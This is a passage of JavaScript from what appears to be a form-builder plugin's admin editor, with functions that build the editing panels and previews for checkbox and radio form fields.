			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";
      	var main_td  = document.getElementById('show_table');
      
      	td1.appendChild(label);
      	td1.appendChild(required);
      	td2.appendChild(adding_type);
      	td2.appendChild(adding_required);
      	td2.appendChild(adding_send);
      	td2.appendChild(adding_unique);
      	td2.appendChild(adding);
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br3);
      	main_td.appendChild(div);
	if(w_field_label_pos=="top")
				label_top(i);
change_class(w_class, i);
refresh_attr(i, 'type_text');
}

function type_checkbox(i, w_field_label, w_field_label_pos, w_flow, w_choices, w_choices_checked, w_rowcol, w_required, w_randomize, w_allow_other,w_allow_other_num, w_class, w_attr_name, w_attr_value) {

	document.getElementById("element_type").value="type_checkbox";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");
	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");

	var edit_main_tr8  = document.createElement('tr');
      		edit_main_tr8.setAttribute("valing", "top");

	var edit_main_tr9  = document.createElement('tr');
      		edit_main_tr9.setAttribute("valing", "top");
  var edit_main_tr10  = document.createElement('tr');
      		edit_main_tr10.setAttribute("valing", "top");
	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";		
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";

		
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px; vertical-align:top;";
      	edit_main_td4.setAttribute("id", "choices");
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
		
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td8 = document.createElement('td');
		edit_main_td8.style.cssText = "padding-top:10px";
	var edit_main_td8_1 = document.createElement('td');
		edit_main_td8_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td9 = document.createElement('td');
		edit_main_td9.style.cssText = "padding-top:10px";
	var edit_main_td9_1 = document.createElement('td');
		edit_main_td9_1.style.cssText = "padding-top:10px";
  var edit_main_td10 = document.createElement('td');
		edit_main_td10.style.cssText = "padding-top:10px";
	var edit_main_td10_1 = document.createElement('td');
		edit_main_td10_1.style.cssText = "padding-top:10px";
		  
	var el_label_label = document.createElement('label');
			        el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px;";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
			        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                
                el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
		Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
			
                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
		Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
	
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");
	var el_label_flow = document.createElement('label');
			        el_label_flow.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_flow.innerHTML = "Relative Position";
	
	var el_flow_vertical = document.createElement('input');
                el_flow_vertical.setAttribute("id", "edit_for_flow_vertical");
                el_flow_vertical.setAttribute("type", "radio");
                el_flow_vertical.setAttribute("value", "ver");
                el_flow_vertical.setAttribute("name", "edit_for_flow");
                el_flow_vertical.setAttribute("onchange", "refresh_rowcol("+i+",'checkbox')");
		Vertical = document.createTextNode("Vertical");
		
	var el_flow_horizontal = document.createElement('input');
                el_flow_horizontal.setAttribute("id", "edit_for_flow_horizontal");
                el_flow_horizontal.setAttribute("type", "radio");
                el_flow_horizontal.setAttribute("value", "hor");
                el_flow_horizontal.setAttribute("name", "edit_for_flow");
                el_flow_horizontal.setAttribute("onchange", "refresh_rowcol("+i+",'checkbox')");
		Horizontal = document.createTextNode("Horizontal");
		
	if(w_flow=="hor")
				el_flow_horizontal.setAttribute("checked", "checked");
	else
				el_flow_vertical.setAttribute("checked", "checked");
  var el_rowcol_label = document.createElement('label');
	        el_rowcol_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_rowcol_label.innerHTML = "Rows/Columns";
	
	var el_rowcol_textarea = document.createElement('input');
                el_rowcol_textarea.setAttribute("id", "edit_for_rowcol");
		el_rowcol_textarea.setAttribute("type", "text");
 		el_rowcol_textarea.setAttribute("value", w_rowcol);
                el_rowcol_textarea.style.cssText = "width:200px;";
                el_rowcol_textarea.setAttribute("onChange", "refresh_rowcol('"+i+"','checkbox')");
				
	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
 		el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			
                el_required.setAttribute("checked", "checked");
		
		
				
	var el_randomize_label = document.createElement('label');
				el_randomize_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_randomize_label.innerHTML = "Randomize in frontend";
	
	var el_randomize = document.createElement('input');
                el_randomize.setAttribute("id", "el_randomize");
                el_randomize.setAttribute("type", "checkbox");
                el_randomize.setAttribute("value", "yes");
                el_randomize.setAttribute("onclick", "set_randomize('"+i+"_randomizeform_id_temp')");
	if(w_randomize=="yes")
			    el_randomize.setAttribute("checked", "checked");

	var el_allow_other_label = document.createElement('label');
				el_allow_other_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_allow_other_label.innerHTML = "Allow other";
	
	var el_allow_other = document.createElement('input');
                el_allow_other.setAttribute("id", "el_allow_other");
                el_allow_other.setAttribute("type", "checkbox");
                el_allow_other.setAttribute("value", "yes");
                el_allow_other.setAttribute("onclick", "set_allow_other('"+i+"','checkbox')");
	if(w_allow_other=="yes")
			    el_allow_other.setAttribute("checked", "checked");



		
	
	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_checkbox')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_checkbox')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_checkbox')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_checkbox')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var el_choices_label = document.createElement('label');
			        el_choices_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_choices_label.innerHTML = "Options ";
	var el_choices_add = document.createElement('img');
                el_choices_add.setAttribute("id", "el_choices_add");
           		el_choices_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_choices_add.style.cssText = 'cursor:pointer;';
            	el_choices_add.setAttribute("title", 'add');
                el_choices_add.setAttribute("onClick", "add_choise('checkbox',"+i+")");
	
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br2);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);

	edit_main_td3.appendChild(el_label_flow);
	edit_main_td3_1.appendChild(el_flow_vertical);
	edit_main_td3_1.appendChild(Vertical);
	edit_main_td3_1.appendChild(br4);
	edit_main_td3_1.appendChild(el_flow_horizontal);
	edit_main_td3_1.appendChild(Horizontal);
	
	edit_main_td5.appendChild(el_required_label);
	edit_main_td5_1.appendChild(el_required);
	
	edit_main_td8.appendChild(el_randomize_label);
	edit_main_td8_1.appendChild(el_randomize);
	
	edit_main_td9.appendChild(el_allow_other_label);
	edit_main_td9_1.appendChild(el_allow_other);
  edit_main_td10.appendChild(el_rowcol_label);
	edit_main_td10_1.appendChild(el_rowcol_textarea);
	
	edit_main_td6.appendChild(el_style_label);
	edit_main_td6_1.appendChild(el_style_textarea);
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br6);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");
	
	edit_main_td4.appendChild(el_choices_label);
	edit_main_td4_1.appendChild(el_choices_add);
	
	n=w_choices.length;
	for(j=0; j<n; j++)
	{	
		var br = document.createElement('br');
			br.setAttribute("id", "br"+j);
			
		var el_choices = document.createElement('input');
			el_choices.setAttribute("id", "el_choices"+j);
			el_choices.setAttribute("type", "text");
      if (w_allow_other == "yes" && j == w_allow_other_num) {
        el_choices.setAttribute("other", '1');
      }
			el_choices.setAttribute("value", w_choices[j]);
			el_choices.style.cssText =   "width:100px; margin:0; padding:0; border-width: 1px";
			el_choices.setAttribute("onKeyUp", "change_label('"+i+"_label_element"+j+"', this.value); change_in_value('"+i+"_elementform_id_temp"+j+"', this.value)");
	
		var el_choices_remove = document.createElement('img');
			el_choices_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_choices_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
		if(w_allow_other=="yes" && j==w_allow_other_num)
			el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px; display:none';
		else			
			el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_choices_remove.setAttribute("align", 'top');
			el_choices_remove.setAttribute("onClick", "remove_choise("+j+","+i+",'checkbox')");
			
		edit_main_td4.appendChild(br);
		edit_main_td4.appendChild(el_choices);
		edit_main_td4.appendChild(el_choices_remove);
	
	}

	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
  edit_main_tr10.appendChild(edit_main_td10);
	edit_main_tr10.appendChild(edit_main_td10_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr10);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	
//show table

	element='input';	type='checkbox'; 
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_checkbox");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
			
 	var adding_randomize = document.createElement("input");
            adding_randomize.setAttribute("type", "hidden");
            adding_randomize.setAttribute("value", w_randomize);
            adding_randomize.setAttribute("name", i+"_randomizeform_id_temp");			
            adding_randomize.setAttribute("id", i+"_randomizeform_id_temp");
	    
	var adding_allow_other= document.createElement("input");
            adding_allow_other.setAttribute("type", "hidden");
            adding_allow_other.setAttribute("value", w_allow_other);
            adding_allow_other.setAttribute("name", i+"_allow_otherform_id_temp");			
            adding_allow_other.setAttribute("id", i+"_allow_otherform_id_temp");
	    
	var adding_allow_other_id= document.createElement("input");
            adding_allow_other_id.setAttribute("type", "hidden");
            adding_allow_other_id.setAttribute("value", w_allow_other_num);
            adding_allow_other_id.setAttribute("name", i+"_allow_other_numform_id_temp");			
            adding_allow_other_id.setAttribute("id", i+"_allow_other_numform_id_temp");
  var adding_rowcol= document.createElement("input");
            adding_rowcol.setAttribute("type", "hidden");
            adding_rowcol.setAttribute("value", w_rowcol);
            adding_rowcol.setAttribute("name", i+"_rowcol_numform_id_temp");			
            adding_rowcol.setAttribute("id", i+"_rowcol_numform_id_temp");
   var div = document.createElement('div');
       	div.setAttribute("id", "main_div");
//tbody sarqac
		
		
	var table = document.createElement('table');
		table.setAttribute("id", i+"_elemet_tableform_id_temp");
	
    var tr = document.createElement('tr');
			
    var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'top');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'top');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");

      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
	//	table_little -@ sarqaca tbody table_little darela table_little_t
	var table_little_t = document.createElement('table');
			
	var table_little = document.createElement('tbody');
           	table_little.setAttribute("id", i+"_table_little");
	table_little_t.appendChild(table_little);
	

	    
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");

	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";
  n = w_choices.length;
  aaa = false;
  var main_td  = document.getElementById('show_table');
	
      
      	td1.appendChild(label);
      	td1.appendChild(required);
        td2.appendChild(adding_type);
  
        td2.appendChild(adding_required);
        td2.appendChild(adding_randomize);
       	td2.appendChild(adding_allow_other);
       	td2.appendChild(adding_allow_other_id);
        td2.appendChild(adding_rowcol);
        td2.appendChild(table_little_t);
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      

      	div.appendChild(table);
      	div.appendChild(br3);
      	main_td.appendChild(div);
	if (w_field_label_pos == "top") {
    label_top(i);
  }
	change_class(w_class, i);
  refresh_attr(i, 'type_checkbox');
  if (aaa) {
    show_other_input(i);
  }
  refresh_rowcol(i, 'checkbox');
  add_id_and_name(i, 'type_checkbox');
}

function type_radio(i, w_field_label, w_field_label_pos, w_flow, w_choices, w_choices_checked, w_rowcol, w_required, w_randomize, w_allow_other, w_allow_other_num, w_class, w_attr_name, w_attr_value ){

	document.getElementById("element_type").value="type_radio";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");
			
	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");
			
	var edit_main_tr8  = document.createElement('tr');
      		edit_main_tr8.setAttribute("valing", "top");

	var edit_main_tr9  = document.createElement('tr');
      		edit_main_tr9.setAttribute("valing", "top");
  var edit_main_tr10  = document.createElement('tr');
      		edit_main_tr10.setAttribute("valing", "top");
	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";		
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";

	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px; vertical-align:top;";
		
		edit_main_td4.setAttribute("id", "choices");
		
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
		
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td8 = document.createElement('td');
		edit_main_td8.style.cssText = "padding-top:10px";
	var edit_main_td8_1 = document.createElement('td');
		edit_main_td8_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td9 = document.createElement('td');
		edit_main_td9.style.cssText = "padding-top:10px";
	var edit_main_td9_1 = document.createElement('td');
		edit_main_td9_1.style.cssText = "padding-top:10px";
  var edit_main_td10 = document.createElement('td');
		edit_main_td10.style.cssText = "padding-top:10px";
	var edit_main_td10_1 = document.createElement('td');
		edit_main_td10_1.style.cssText = "padding-top:10px";
		  
	var el_label_label = document.createElement('label');
			        el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px;";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
			        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                

                el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
				el_label_position1.setAttribute("checked", "checked");
		Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");

                el_label_position2.setAttribute("value", "top");
	

                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
		Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
	
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");
	
	var el_label_flow = document.createElement('label');
			        el_label_flow.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_flow.innerHTML = "Relative Position";

	var el_flow_vertical = document.createElement('input');
                el_flow_vertical.setAttribute("id", "edit_for_flow_vertical");
                el_flow_vertical.setAttribute("type", "radio");
                el_flow_vertical.setAttribute("value", "ver");
                el_flow_vertical.setAttribute("name", "edit_for_flow");
                el_flow_vertical.setAttribute("onchange", "refresh_rowcol("+i+",'radio')");
		Vertical = document.createTextNode("Vertical");
		
	var el_flow_horizontal = document.createElement('input');
            el_flow_horizontal.setAttribute("id", "edit_for_flow_horizontal");
            el_flow_horizontal.setAttribute("type", "radio");
            el_flow_horizontal.setAttribute("value", "hor");
            el_flow_horizontal.setAttribute("name", "edit_for_flow");
            el_flow_horizontal.setAttribute("onchange", "refresh_rowcol("+i+",'radio')");
		Horizontal = document.createTextNode("Horizontal");
		
	if(w_flow=="hor")
				el_flow_horizontal.setAttribute("checked", "checked");
	else
				el_flow_vertical.setAttribute("checked", "checked");
  var el_rowcol_label = document.createElement('label');
	        el_rowcol_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_rowcol_label.innerHTML = "Rows/Columns";
	
	var el_rowcol_textarea = document.createElement('input');
                el_rowcol_textarea.setAttribute("id", "edit_for_rowcol");
		el_rowcol_textarea.setAttribute("type", "text");
 		el_rowcol_textarea.setAttribute("value", w_rowcol);
                el_rowcol_textarea.style.cssText = "width:200px;";
                el_rowcol_textarea.setAttribute("onChange", "refresh_rowcol('"+i+"','radio')");
	var el_style_label = document.createElement('label');
	    el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
        el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
        el_style_textarea.style.cssText = "width:200px;";
        el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");
	
	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			
                el_required.setAttribute("checked", "checked");

				
	var el_randomize_label = document.createElement('label');
				el_randomize_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_randomize_label.innerHTML = "Randomize in frontend";
	
	var el_randomize = document.createElement('input');
                el_randomize.setAttribute("id", "el_randomize");
                el_randomize.setAttribute("type", "checkbox");
                el_randomize.setAttribute("value", "yes");
                el_randomize.setAttribute("onclick", "set_randomize('"+i+"_randomizeform_id_temp')");
	if(w_randomize=="yes")
			    el_randomize.setAttribute("checked", "checked");

	var el_allow_other_label = document.createElement('label');
				el_allow_other_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_allow_other_label.innerHTML = "Allow other";
	
	var el_allow_other = document.createElement('input');
                el_allow_other.setAttribute("id", "el_allow_other");
                el_allow_other.setAttribute("type", "checkbox");
                el_allow_other.setAttribute("value", "yes");
                el_allow_other.setAttribute("onclick", "set_allow_other('"+i+"','radio')");
	if(w_allow_other=="yes")
			    el_allow_other.setAttribute("checked", "checked");




	var el_attr_label = document.createElement('label');
